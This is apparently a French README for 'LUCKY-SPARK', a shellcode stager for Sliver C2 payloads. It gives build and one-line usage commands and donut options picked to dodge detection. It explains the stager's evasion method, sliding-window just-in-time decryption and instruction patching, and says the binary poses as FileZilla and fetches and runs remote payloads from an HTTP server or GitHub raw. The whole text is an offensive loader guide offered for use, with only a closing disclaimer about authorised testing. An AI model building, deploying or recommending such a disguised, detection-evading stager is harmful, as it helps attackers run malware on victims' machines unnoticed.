
Un stager furtif conçu pour des charges utiles de shellcode mises en scène via http/https comme Sliver, ou sur github raw.
⟪ LUCKY-SPARK ⟫ est un stager conçu pour les payloads shellcode hébergées via http/https comme Sliver ou sur github raw. Il utilise des méthodes modernes d'obfuscation et d'évasion comme le déchiffrement juste-à-temps par fenêtre glissante de la payload et le patchage d'instructions CPU. Par défaut, il crée un exécutable se faisant passer pour le client FTP FileZilla.
Clonez ou téléchargez le dépôt et assurez-vous d'avoir et installés sur votre système.
makemingwgit clone <repository_url>
cd LUCKY-SPARK
Exécutez le script de création du binaire.
./luckySpark.sh
Il vous sera demandé de saisir l'URL de votre payload stagée et un User-Agent facultatif.

Peut être exécuté en une seule ligne pour pouvoir être intégré dans des scripts :
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

Si vous utilisez donut ou Sliver (qui utilise donut), je recommande ces options pour créer la payload :
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
Cela évite un comportement suspect et signalé de la part de donut. Ironiquement, c'est surtout l'évasion de donut qui est fortement signalée.
Ceci crée un binaire filezilla.exe qui, une fois exécuté, récupère et exécute la payload.
Ce stager a été conçu pour être utilisé avec Sliver. Stagiez une payload Sliver comme décrit ici Sliver Staging Ne chiffrez pas la payload.
Mais toute méthode de staging basée sur http/https fonctionnera.
comme python3 -m http.server
ou une payload téléchargée sur github.com dans un dépôt public.
Ce stager ne prend PAS en charge le protocole de staging meterpreter.
Step 1: RIP hits Page 0 and Page 0 gets decrypted
Pages: [ D | E | E | ... ]
RIP -> ^
Step 2: RIP hits Page 1 and Page 1 gets decrypted
Pages: [ D | D | E | ... ]
RIP -> ^
Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
Pages: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK est destiné uniquement à des fins éducatives, de recherche et de tests d'intrusion autorisés. Toute utilisation non autorisée contre des systèmes sans permission est illégale et contraire à l'éthique.